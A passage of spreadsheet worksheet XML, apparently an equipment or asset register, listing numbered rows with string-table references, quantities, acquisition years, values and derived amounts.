      <c r="J18" s="192">
        <v>3500</v>
      </c>
      <c r="K18" s="188">
        <v>140</v>
      </c>
      <c r="L18" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="19" customHeight="1" spans="2:12">
      <c r="B19" s="16">
        <v>13</v>
      </c>
      <c r="C19" s="237" t="s">
        <v>1976</v>
      </c>
      <c r="D19" s="238" t="s">
        <v>1977</v>
      </c>
      <c r="E19" s="238" t="s">
        <v>1978</v>
      </c>
      <c r="F19" s="11"/>
      <c r="G19" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H19" s="11">
        <v>2</v>
      </c>
      <c r="I19" s="11">
        <v>1996</v>
      </c>
      <c r="J19" s="192">
        <v>22000</v>
      </c>
      <c r="K19" s="188">
        <v>880</v>
      </c>
      <c r="L19" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="20" customHeight="1" spans="2:12">
      <c r="B20" s="16">
        <v>14</v>
      </c>
      <c r="C20" s="237" t="s">
        <v>1979</v>
      </c>
      <c r="D20" s="238" t="s">
        <v>1980</v>
      </c>
      <c r="E20" s="238" t="s">
        <v>1981</v>
      </c>
      <c r="F20" s="11"/>
      <c r="G20" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H20" s="11">
        <v>1</v>
      </c>
      <c r="I20" s="11">
        <v>1996</v>
      </c>
      <c r="J20" s="192">
        <v>4600</v>
      </c>
      <c r="K20" s="188">
        <v>184</v>
      </c>
      <c r="L20" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="21" customHeight="1" spans="2:12">
      <c r="B21" s="16">
        <v>15</v>
      </c>
      <c r="C21" s="237" t="s">
        <v>1982</v>
      </c>
      <c r="D21" s="238" t="s">
        <v>1974</v>
      </c>
      <c r="E21" s="238" t="s">
        <v>1983</v>
      </c>
      <c r="F21" s="11"/>
      <c r="G21" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H21" s="11">
        <v>2</v>
      </c>
      <c r="I21" s="11">
        <v>1996</v>
      </c>
      <c r="J21" s="192">
        <v>19000</v>
      </c>
      <c r="K21" s="188">
        <v>760</v>
      </c>
      <c r="L21" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="22" customHeight="1" spans="2:12">
      <c r="B22" s="16">
        <v>16</v>
      </c>
      <c r="C22" s="237" t="s">
        <v>1984</v>
      </c>
      <c r="D22" s="238" t="s">
        <v>1971</v>
      </c>
      <c r="E22" s="238" t="s">
        <v>1985</v>
      </c>
      <c r="F22" s="11"/>
      <c r="G22" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H22" s="11">
        <v>2</v>
      </c>
      <c r="I22" s="11">
        <v>1996</v>
      </c>
      <c r="J22" s="192">
        <v>20000</v>
      </c>
      <c r="K22" s="188">
        <v>800</v>
      </c>
      <c r="L22" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="23" customHeight="1" spans="2:12">
      <c r="B23" s="16">
        <v>17</v>
      </c>
      <c r="C23" s="237" t="s">
        <v>1986</v>
      </c>
      <c r="D23" s="238" t="s">
        <v>1987</v>
      </c>
      <c r="E23" s="238" t="s">
        <v>1988</v>
      </c>
      <c r="F23" s="11"/>
      <c r="G23" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H23" s="11">
        <v>15</v>
      </c>
      <c r="I23" s="11">
        <v>1996</v>
      </c>
      <c r="J23" s="192">
        <v>27000</v>
      </c>
      <c r="K23" s="188">
        <v>1080</v>
      </c>
      <c r="L23" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="24" customHeight="1" spans="2:12">
      <c r="B24" s="16">
        <v>18</v>
      </c>
      <c r="C24" s="237" t="s">
        <v>1989</v>
      </c>
      <c r="D24" s="238" t="s">
        <v>1990</v>
      </c>
      <c r="E24" s="238" t="s">
        <v>1991</v>
      </c>
      <c r="F24" s="11"/>
      <c r="G24" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H24" s="11">
        <v>1</v>
      </c>
      <c r="I24" s="11">
        <v>1996</v>
      </c>
      <c r="J24" s="192">
        <v>4800</v>
      </c>
      <c r="K24" s="188">
        <v>192</v>
      </c>
      <c r="L24" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="25" customHeight="1" spans="2:12">
      <c r="B25" s="16">
        <v>19</v>
      </c>
      <c r="C25" s="237" t="s">
        <v>1992</v>
      </c>
      <c r="D25" s="238" t="s">
        <v>1993</v>
      </c>
      <c r="E25" s="238" t="s">
        <v>1994</v>
      </c>
      <c r="F25" s="11"/>
      <c r="G25" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H25" s="11">
        <v>2</v>
      </c>
      <c r="I25" s="11">
        <v>1996</v>
      </c>
      <c r="J25" s="192">
        <v>273000</v>
      </c>
      <c r="K25" s="188">
        <v>10920</v>
      </c>
      <c r="L25" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="26" customHeight="1" spans="2:12">
      <c r="B26" s="16">
        <v>20</v>
      </c>
      <c r="C26" s="237" t="s">
        <v>1995</v>
      </c>
      <c r="D26" s="10" t="s">
        <v>1996</v>
      </c>
      <c r="E26" s="10"/>
      <c r="F26" s="11"/>
      <c r="G26" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H26" s="11">
        <v>1</v>
      </c>
      <c r="I26" s="11">
        <v>2003</v>
      </c>
      <c r="J26" s="190">
        <v>1600</v>
      </c>
      <c r="K26" s="188">
        <v>0</v>
      </c>
      <c r="L26" s="246" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="27" customHeight="1" spans="2:12">
      <c r="B27" s="16">
        <v>21</v>
      </c>
      <c r="C27" s="237" t="s">
        <v>1997</v>
      </c>
      <c r="D27" s="238" t="s">
        <v>1998</v>
      </c>
      <c r="E27" s="238" t="s">
        <v>1999</v>
      </c>
      <c r="F27" s="11"/>
      <c r="G27" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H27" s="11">
        <v>1</v>
      </c>
      <c r="I27" s="237" t="s">
        <v>2000</v>
      </c>
      <c r="J27" s="192">
        <v>198000</v>
      </c>
      <c r="K27" s="188">
        <v>31680</v>
      </c>
      <c r="L27" s="246" t="s">
        <v>2001</v>
      </c>
    </row>
    <row r="28" customHeight="1" spans="2:12">
      <c r="B28" s="16"/>
      <c r="C28" s="11"/>
      <c r="D28" s="10" t="s">
        <v>2002</v>
      </c>
      <c r="E28" s="10"/>
      <c r="F28" s="11"/>
      <c r="G28" s="16"/>
      <c r="H28" s="11"/>
      <c r="I28" s="11"/>
      <c r="J28" s="190"/>
      <c r="K28" s="188">
        <v>0</v>
      </c>
      <c r="L28" s="191"/>
    </row>
    <row r="29" customHeight="1" spans="2:12">
      <c r="B29" s="16"/>
      <c r="C29" s="11"/>
      <c r="D29" s="16" t="s">
        <v>2003</v>
      </c>
      <c r="E29" s="16" t="s">
        <v>2004</v>
      </c>
      <c r="F29" s="16" t="s">
        <v>2005</v>
      </c>
      <c r="G29" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H29" s="16">
        <v>1</v>
      </c>
      <c r="I29" s="11"/>
      <c r="J29" s="190"/>
      <c r="K29" s="188">
        <v>0</v>
      </c>
      <c r="L29" s="246" t="s">
        <v>2001</v>
      </c>
    </row>
    <row r="30" customHeight="1" spans="2:12">
      <c r="B30" s="16"/>
      <c r="C30" s="11"/>
      <c r="D30" s="16" t="s">
        <v>2006</v>
      </c>
      <c r="E30" s="16" t="s">
        <v>2007</v>
      </c>
      <c r="F30" s="16" t="s">
        <v>2008</v>
      </c>
      <c r="G30" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H30" s="16">
        <v>1</v>
      </c>
      <c r="I30" s="11"/>
      <c r="J30" s="190"/>
      <c r="K30" s="188">
        <v>0</v>
      </c>
      <c r="L30" s="246" t="s">
        <v>2001</v>
      </c>
    </row>
    <row r="31" customHeight="1" spans="2:12">
      <c r="B31" s="16"/>
      <c r="C31" s="11"/>
      <c r="D31" s="16" t="s">
        <v>2009</v>
      </c>
      <c r="E31" s="10"/>
      <c r="F31" s="16" t="s">
        <v>2010</v>
      </c>
      <c r="G31" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H31" s="16">
        <v>10</v>
      </c>
      <c r="I31" s="11"/>
      <c r="J31" s="190"/>
      <c r="K31" s="188">
        <v>0</v>
      </c>
      <c r="L31" s="246" t="s">
        <v>2001</v>
      </c>
    </row>
    <row r="32" customHeight="1" spans="2:12">
      <c r="B32" s="16"/>
      <c r="C32" s="11"/>
      <c r="D32" s="16" t="s">
        <v>2011</v>
      </c>
      <c r="E32" s="10"/>
      <c r="F32" s="16" t="s">
        <v>2012</v>
      </c>
      <c r="G32" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H32" s="16">
        <v>7</v>
      </c>
      <c r="I32" s="11"/>
      <c r="J32" s="190"/>
      <c r="K32" s="188">
        <v>0</v>
      </c>
      <c r="L32" s="246" t="s">
        <v>2001</v>
      </c>
    </row>
    <row r="33" customHeight="1" spans="2:12">
      <c r="B33" s="16"/>
      <c r="C33" s="11"/>
      <c r="D33" s="16" t="s">
        <v>2013</v>
      </c>
      <c r="E33" s="10"/>
      <c r="F33" s="16" t="s">
        <v>2010</v>
      </c>
      <c r="G33" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H33" s="16">
        <v>7</v>
      </c>
      <c r="I33" s="11"/>
      <c r="J33" s="190"/>
      <c r="K33" s="188">
        <v>0</v>
      </c>
      <c r="L33" s="246" t="s">
        <v>2001</v>
      </c>
    </row>
    <row r="34" customHeight="1" spans="2:12">
      <c r="B34" s="16"/>
      <c r="C34" s="11"/>
      <c r="D34" s="16" t="s">
        <v>1962</v>
      </c>
      <c r="E34" s="16" t="s">
        <v>2014</v>
      </c>
      <c r="F34" s="16" t="s">
        <v>2015</v>
      </c>
      <c r="G34" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H34" s="16">
        <v>2</v>
      </c>
      <c r="I34" s="11"/>
      <c r="J34" s="190"/>
      <c r="K34" s="188">
        <v>0</v>
      </c>
      <c r="L34" s="246" t="s">
        <v>2001</v>
      </c>
    </row>
    <row r="35" customHeight="1" spans="2:12">
      <c r="B35" s="16"/>
      <c r="C35" s="11"/>
      <c r="D35" s="16" t="s">
        <v>2016</v>
      </c>
      <c r="E35" s="16" t="s">
        <v>2017</v>
      </c>
      <c r="F35" s="16" t="s">
        <v>2018</v>
      </c>
      <c r="G35" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H35" s="16">
        <v>1</v>
      </c>
      <c r="I35" s="11"/>
      <c r="J35" s="190"/>
      <c r="K35" s="188">
        <v>0</v>
      </c>
      <c r="L35" s="246" t="s">
        <v>2001</v>
      </c>
    </row>
    <row r="36" customHeight="1" spans="2:12">
      <c r="B36" s="16"/>
      <c r="C36" s="11"/>
      <c r="D36" s="16" t="s">
        <v>2019</v>
      </c>
      <c r="E36" s="10"/>
      <c r="F36" s="11"/>
      <c r="G36" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H36" s="16">
        <v>1</v>
      </c>
      <c r="I36" s="11"/>
      <c r="J36" s="190"/>
      <c r="K36" s="188">
        <v>0</v>
      </c>
      <c r="L36" s="246" t="s">
        <v>2001</v>
      </c>
    </row>
    <row r="37" customHeight="1" spans="2:12">
      <c r="B37" s="16">
        <v>22</v>
      </c>
      <c r="C37" s="237" t="s">
        <v>2020</v>
      </c>
      <c r="D37" s="238" t="s">
        <v>2021</v>
      </c>
      <c r="E37" s="238" t="s">
        <v>2022</v>
      </c>
      <c r="F37" s="11"/>
      <c r="G37" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H37" s="11">
        <v>1</v>
      </c>
      <c r="I37" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J37" s="192">
        <v>4900</v>
      </c>
      <c r="K37" s="188">
        <v>98</v>
      </c>
      <c r="L37" s="239" t="s">
        <v>2023</v>
      </c>
    </row>
    <row r="38" customHeight="1" spans="2:12">
      <c r="B38" s="16">
        <v>23</v>
      </c>
      <c r="C38" s="237" t="s">
        <v>2024</v>
      </c>
      <c r="D38" s="238" t="s">
        <v>2025</v>
      </c>
      <c r="E38" s="238" t="s">
        <v>2026</v>
      </c>
      <c r="F38" s="11"/>
      <c r="G38" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H38" s="11">
        <v>1</v>
      </c>
      <c r="I38" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J38" s="192">
        <v>9300</v>
      </c>
      <c r="K38" s="188">
        <v>372</v>
      </c>
      <c r="L38" s="239" t="s">
        <v>2023</v>
      </c>
    </row>
    <row r="39" customHeight="1" spans="2:12">
      <c r="B39" s="16">
        <v>24</v>
      </c>
      <c r="C39" s="237" t="s">
        <v>2027</v>
      </c>
      <c r="D39" s="238" t="s">
        <v>2028</v>
      </c>
      <c r="E39" s="238" t="s">
        <v>2029</v>
      </c>
      <c r="F39" s="11"/>
      <c r="G39" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H39" s="11">
        <v>1</v>
      </c>
      <c r="I39" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J39" s="192">
        <v>6100</v>
      </c>
      <c r="K39" s="188">
        <v>244</v>
      </c>
      <c r="L39" s="239" t="s">
        <v>2023</v>
      </c>
    </row>
    <row r="40" customHeight="1" spans="2:12">
      <c r="B40" s="16">
        <v>25</v>
      </c>
      <c r="C40" s="237" t="s">
        <v>2030</v>
      </c>
      <c r="D40" s="238" t="s">
        <v>2031</v>
      </c>
      <c r="E40" s="238" t="s">
        <v>2032</v>
      </c>
      <c r="F40" s="11"/>
      <c r="G40" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H40" s="11">
        <v>1</v>
      </c>
      <c r="I40" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J40" s="192">
        <v>13500</v>
      </c>
      <c r="K40" s="188">
        <v>540</v>
      </c>
      <c r="L40" s="239" t="s">
        <v>2023</v>
      </c>
    </row>
    <row r="41" customHeight="1" spans="2:12">
      <c r="B41" s="16">
        <v>26</v>
      </c>
      <c r="C41" s="237" t="s">
        <v>2033</v>
      </c>
      <c r="D41" s="238" t="s">
        <v>2034</v>
      </c>
      <c r="E41" s="238" t="s">
        <v>2035</v>
      </c>
      <c r="F41" s="11"/>
      <c r="G41" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H41" s="11">
        <v>1</v>
      </c>
      <c r="I41" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J41" s="192">
        <v>4100</v>
      </c>
      <c r="K41" s="188">
        <v>164</v>
      </c>
      <c r="L41" s="239" t="s">
        <v>2023</v>
      </c>
    </row>
    <row r="42" customHeight="1" spans="2:12">
      <c r="B42" s="16">
        <v>27</v>
      </c>
      <c r="C42" s="237" t="s">
        <v>2036</v>
      </c>
      <c r="D42" s="238" t="s">
        <v>2037</v>
      </c>
      <c r="E42" s="238" t="s">
        <v>2038</v>
      </c>
      <c r="F42" s="11"/>
      <c r="G42" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H42" s="11">
        <v>11</v>
      </c>
      <c r="I42" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J42" s="192">
        <v>2600</v>
      </c>
      <c r="K42" s="188">
        <v>572</v>
      </c>
      <c r="L42" s="239" t="s">
        <v>2023</v>
      </c>
    </row>
    <row r="43" customHeight="1" spans="2:12">
      <c r="B43" s="16">
        <v>28</v>
      </c>
      <c r="C43" s="237" t="s">
        <v>2039</v>
      </c>
      <c r="D43" s="10" t="s">
        <v>1996</v>
      </c>
      <c r="E43" s="10" t="s">
        <v>2040</v>
      </c>
      <c r="F43" s="11"/>
      <c r="G43" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H43" s="11">
        <v>1</v>
      </c>
      <c r="I43" s="11"/>
      <c r="J43" s="190">
        <v>2500</v>
      </c>
      <c r="K43" s="188">
        <v>0</v>
      </c>
      <c r="L43" s="239" t="s">
        <v>2023</v>
      </c>
    </row>
    <row r="44" customHeight="1" spans="2:12">
      <c r="B44" s="16">
        <v>29</v>
      </c>
      <c r="C44" s="237" t="s">
        <v>2041</v>
      </c>
      <c r="D44" s="238" t="s">
        <v>2042</v>
      </c>
      <c r="E44" s="238" t="s">
        <v>2022</v>
      </c>
      <c r="F44" s="11"/>
      <c r="G44" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H44" s="11">
        <v>3</v>
      </c>
      <c r="I44" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J44" s="192">
        <v>6500</v>
      </c>
      <c r="K44" s="188">
        <v>390</v>
      </c>
      <c r="L44" s="239" t="s">
        <v>2043</v>
      </c>
    </row>
    <row r="45" customHeight="1" spans="2:12">
      <c r="B45" s="16">
        <v>30</v>
      </c>
      <c r="C45" s="237" t="s">
        <v>2044</v>
      </c>
      <c r="D45" s="238" t="s">
        <v>2045</v>
      </c>
      <c r="E45" s="238" t="s">
        <v>1950</v>
      </c>
      <c r="F45" s="11"/>
      <c r="G45" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H45" s="11">
        <v>5</v>
      </c>
      <c r="I45" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J45" s="192">
        <v>15000</v>
      </c>
      <c r="K45" s="188">
        <v>1000</v>
      </c>
      <c r="L45" s="239" t="s">
        <v>2043</v>
      </c>
    </row>
    <row r="46" customHeight="1" spans="2:12">
      <c r="B46" s="16">
        <v>31</v>
      </c>
      <c r="C46" s="237" t="s">
        <v>2046</v>
      </c>
      <c r="D46" s="239" t="s">
        <v>2037</v>
      </c>
      <c r="E46" s="10"/>
      <c r="F46" s="11"/>
      <c r="G46" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H46" s="11">
        <v>3</v>
      </c>
      <c r="I46" s="11"/>
      <c r="J46" s="190">
        <v>9000</v>
      </c>
      <c r="K46" s="188">
        <v>0</v>
      </c>
      <c r="L46" s="96"/>
    </row>
    <row r="47" customHeight="1" spans="2:12">
      <c r="B47" s="16">
        <v>32</v>
      </c>
      <c r="C47" s="237" t="s">
        <v>2047</v>
      </c>
      <c r="D47" s="238" t="s">
        <v>1945</v>
      </c>
      <c r="E47" s="238" t="s">
        <v>2048</v>
      </c>
      <c r="F47" s="11"/>
      <c r="G47" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H47" s="11">
        <v>5</v>
      </c>
      <c r="I47" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J47" s="192">
        <v>3300</v>
      </c>
      <c r="K47" s="188">
        <v>220</v>
      </c>
      <c r="L47" s="239" t="s">
        <v>2043</v>
      </c>
    </row>
    <row r="48" customHeight="1" spans="2:12">
      <c r="B48" s="16">
        <v>33</v>
      </c>
      <c r="C48" s="237" t="s">
        <v>2049</v>
      </c>
      <c r="D48" s="238" t="s">
        <v>2050</v>
      </c>
      <c r="E48" s="238" t="s">
        <v>2051</v>
      </c>
      <c r="F48" s="16"/>
      <c r="G48" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H48" s="11">
        <v>4</v>
      </c>
      <c r="I48" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J48" s="192">
        <v>11000</v>
      </c>
      <c r="K48" s="188">
        <v>0</v>
      </c>
      <c r="L48" s="239" t="s">
        <v>2052</v>
      </c>
    </row>
    <row r="49" customHeight="1" spans="2:12">
      <c r="B49" s="16">
        <v>34</v>
      </c>
      <c r="C49" s="237" t="s">
        <v>2053</v>
      </c>
      <c r="D49" s="238" t="s">
        <v>2054</v>
      </c>
      <c r="E49" s="238" t="s">
        <v>2055</v>
      </c>
      <c r="F49" s="16"/>
      <c r="G49" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H49" s="11">
        <v>1</v>
      </c>
      <c r="I49" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J49" s="192">
        <v>2800</v>
      </c>
      <c r="K49" s="188">
        <v>0</v>
      </c>
      <c r="L49" s="239" t="s">
        <v>2052</v>
      </c>
    </row>
    <row r="50" customHeight="1" spans="2:12">
      <c r="B50" s="16">
        <v>35</v>
      </c>
      <c r="C50" s="237" t="s">
        <v>2056</v>
      </c>
      <c r="D50" s="238" t="s">
        <v>2057</v>
      </c>
      <c r="E50" s="238" t="s">
        <v>2058</v>
      </c>
      <c r="F50" s="16"/>
      <c r="G50" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H50" s="11">
        <v>2</v>
      </c>
      <c r="I50" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J50" s="192">
        <v>24600</v>
      </c>
      <c r="K50" s="188">
        <v>0</v>
      </c>
      <c r="L50" s="239" t="s">
        <v>2052</v>
      </c>
    </row>
    <row r="51" customHeight="1" spans="2:12">
      <c r="B51" s="16">
        <v>36</v>
      </c>
      <c r="C51" s="237" t="s">
        <v>2059</v>
      </c>
      <c r="D51" s="238" t="s">
        <v>2060</v>
      </c>
      <c r="E51" s="238" t="s">
        <v>2061</v>
      </c>
      <c r="F51" s="16"/>
      <c r="G51" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H51" s="11">
        <v>2</v>
      </c>
      <c r="I51" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J51" s="192">
        <v>86000</v>
      </c>
      <c r="K51" s="188">
        <v>0</v>
      </c>
      <c r="L51" s="239" t="s">
        <v>2062</v>
      </c>
    </row>
    <row r="52" customHeight="1" spans="2:12">
      <c r="B52" s="16">
        <v>37</v>
      </c>
      <c r="C52" s="16"/>
      <c r="D52" s="10" t="s">
        <v>2009</v>
      </c>
      <c r="E52" s="10"/>
      <c r="F52" s="11"/>
      <c r="G52" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H52" s="11">
        <v>1</v>
      </c>
      <c r="I52" s="11"/>
      <c r="J52" s="190"/>
      <c r="K52" s="188">
        <v>600</v>
      </c>
      <c r="L52" s="239" t="s">
        <v>2043</v>
      </c>
    </row>
    <row r="53" customHeight="1" spans="2:12">
      <c r="B53" s="16">
        <v>38</v>
      </c>
      <c r="C53" s="16"/>
      <c r="D53" s="10" t="s">
        <v>2063</v>
      </c>
      <c r="E53" s="10"/>
      <c r="F53" s="11"/>
      <c r="G53" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H53" s="11">
        <v>14</v>
      </c>
      <c r="I53" s="11">
        <v>2005</v>
      </c>
      <c r="J53" s="190"/>
      <c r="K53" s="188">
        <v>1120</v>
      </c>
      <c r="L53" s="239" t="s">
        <v>2043</v>
      </c>
    </row>
    <row r="54" customHeight="1" spans="2:12">
      <c r="B54" s="16">
        <v>39</v>
      </c>
      <c r="C54" s="16"/>
      <c r="D54" s="10" t="s">
        <v>2064</v>
      </c>
      <c r="E54" s="10"/>
      <c r="F54" s="11"/>
      <c r="G54" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H54" s="11">
        <v>3</v>
      </c>
      <c r="I54" s="11">
        <v>2005</v>
      </c>
      <c r="J54" s="190"/>
      <c r="K54" s="188">
        <v>120</v>
      </c>
      <c r="L54" s="239" t="s">
        <v>2043</v>
      </c>
    </row>
    <row r="55" customHeight="1" spans="2:12">
      <c r="B55" s="16">
        <v>40</v>
      </c>
      <c r="C55" s="16"/>
      <c r="D55" s="10" t="s">
        <v>2065</v>
      </c>
      <c r="E55" s="10"/>
      <c r="F55" s="11"/>
      <c r="G55" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H55" s="11">
        <v>3</v>
      </c>
      <c r="I55" s="11">
        <v>2005</v>
      </c>
      <c r="J55" s="190"/>
      <c r="K55" s="188">
        <v>1200</v>
      </c>
      <c r="L55" s="239" t="s">
        <v>2043</v>
      </c>
    </row>
    <row r="56" customHeight="1" spans="2:12">
      <c r="B56" s="16">
        <v>41</v>
      </c>
      <c r="C56" s="180"/>
      <c r="D56" s="181" t="s">
        <v>2066</v>
      </c>
      <c r="E56" s="181"/>
      <c r="F56" s="182"/>
      <c r="G56" s="183" t="s">
        <v>466</v>
      </c>
      <c r="H56" s="182">
        <v>1</v>
      </c>
      <c r="I56" s="182">
        <v>2014</v>
      </c>
      <c r="J56" s="193"/>
      <c r="K56" s="188">
        <v>160000</v>
      </c>
      <c r="L56" s="194" t="s">
        <v>2052</v>
      </c>
    </row>
    <row r="57" customHeight="1" spans="2:12">
      <c r="B57" s="16">
        <v>42</v>
      </c>
      <c r="C57" s="237" t="s">
        <v>2067</v>
      </c>
      <c r="D57" s="238" t="s">
        <v>2068</v>
      </c>
      <c r="E57" s="238" t="s">
        <v>2069</v>
      </c>
      <c r="F57" s="11"/>
      <c r="G57" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H57" s="11">
        <v>4</v>
      </c>
      <c r="I57" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J57" s="192">
        <v>2940</v>
      </c>
      <c r="K57" s="188">
        <v>117.6</v>
      </c>
      <c r="L57" s="246" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="58" customHeight="1" spans="2:12">
      <c r="B58" s="16">
        <v>43</v>
      </c>
      <c r="C58" s="237" t="s">
        <v>2070</v>
      </c>
      <c r="D58" s="238" t="s">
        <v>2071</v>
      </c>
      <c r="E58" s="238" t="s">
        <v>2069</v>
      </c>
      <c r="F58" s="11"/>
      <c r="G58" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H58" s="11">
        <v>6</v>
      </c>
      <c r="I58" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J58" s="192">
        <v>1470</v>
      </c>
      <c r="K58" s="188">
        <v>168</v>
      </c>
      <c r="L58" s="246" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="59" customHeight="1" spans="2:12">
      <c r="B59" s="16">
        <v>44</v>
      </c>
      <c r="C59" s="237" t="s">
        <v>2072</v>
      </c>
      <c r="D59" s="238" t="s">
        <v>2073</v>
      </c>
      <c r="E59" s="238" t="s">
        <v>2074</v>
      </c>
      <c r="F59" s="11"/>
      <c r="G59" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H59" s="11">
        <v>2</v>
      </c>
      <c r="I59" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J59" s="192">
        <v>1680</v>
      </c>
      <c r="K59" s="188">
        <v>67.2</v>
      </c>
      <c r="L59" s="246" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="60" customHeight="1" spans="2:12">
      <c r="B60" s="16">
        <v>45</v>
      </c>
      <c r="C60" s="237" t="s">
        <v>2075</v>
      </c>
      <c r="D60" s="238" t="s">
        <v>2076</v>
      </c>
      <c r="E60" s="238" t="s">
        <v>2077</v>
      </c>
      <c r="F60" s="180"/>
      <c r="G60" s="180" t="s">
        <v>507</v>
      </c>
      <c r="H60" s="11">
        <v>3</v>
      </c>
      <c r="I60" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J60" s="192">
        <v>3500</v>
      </c>
      <c r="K60" s="188">
        <v>0</v>
      </c>
      <c r="L60" s="191"/>
    </row>
    <row r="61" customHeight="1" spans="2:12">
      <c r="B61" s="16">
        <v>46</v>
      </c>
      <c r="C61" s="237" t="s">
        <v>2078</v>
      </c>
      <c r="D61" s="238" t="s">
        <v>2079</v>
      </c>
      <c r="E61" s="238" t="s">
        <v>2080</v>
      </c>
      <c r="F61" s="11"/>
      <c r="G61" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H61" s="11">
        <v>1</v>
      </c>
      <c r="I61" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J61" s="192">
        <v>3500</v>
      </c>
      <c r="K61" s="188">
        <v>140</v>
      </c>
      <c r="L61" s="246" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="62" customHeight="1" spans="2:12">
      <c r="B62" s="16">
        <v>47</v>
      </c>
      <c r="C62" s="237" t="s">
        <v>2081</v>
      </c>
      <c r="D62" s="238" t="s">
        <v>2063</v>
      </c>
      <c r="E62" s="238" t="s">
        <v>2082</v>
      </c>
      <c r="F62" s="11"/>
      <c r="G62" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H62" s="11">
        <v>1</v>
      </c>
      <c r="I62" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J62" s="190">
        <v>740</v>
      </c>
      <c r="K62" s="188">
        <v>29.6</v>
      </c>
      <c r="L62" s="246" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="63" customHeight="1" spans="2:12">
      <c r="B63" s="16">
        <v>48</v>
      </c>
      <c r="C63" s="237" t="s">
        <v>2083</v>
      </c>
      <c r="D63" s="238" t="s">
        <v>2084</v>
      </c>
      <c r="E63" s="238" t="s">
        <v>2085</v>
      </c>
      <c r="F63" s="11"/>
      <c r="G63" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H63" s="11">
        <v>1</v>
      </c>
      <c r="I63" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J63" s="192">
        <v>5500</v>
      </c>
      <c r="K63" s="188">
        <v>220</v>
      </c>
      <c r="L63" s="246" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="64" customHeight="1" spans="2:12">
      <c r="B64" s="16">
        <v>49</v>
      </c>
      <c r="C64" s="237" t="s">
        <v>2086</v>
      </c>
      <c r="D64" s="238" t="s">
        <v>1962</v>
      </c>
      <c r="E64" s="238" t="s">
        <v>2087</v>
      </c>
      <c r="F64" s="11"/>
      <c r="G64" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H64" s="11">
        <v>1</v>
      </c>
      <c r="I64" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J64" s="192">
        <v>45900</v>
      </c>
      <c r="K64" s="188">
        <v>5508</v>
      </c>
      <c r="L64" s="246" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="65" customHeight="1" spans="2:12">
      <c r="B65" s="16">
        <v>50</v>
      </c>
      <c r="C65" s="237" t="s">
        <v>2088</v>
      </c>
      <c r="D65" s="238" t="s">
        <v>2009</v>
      </c>
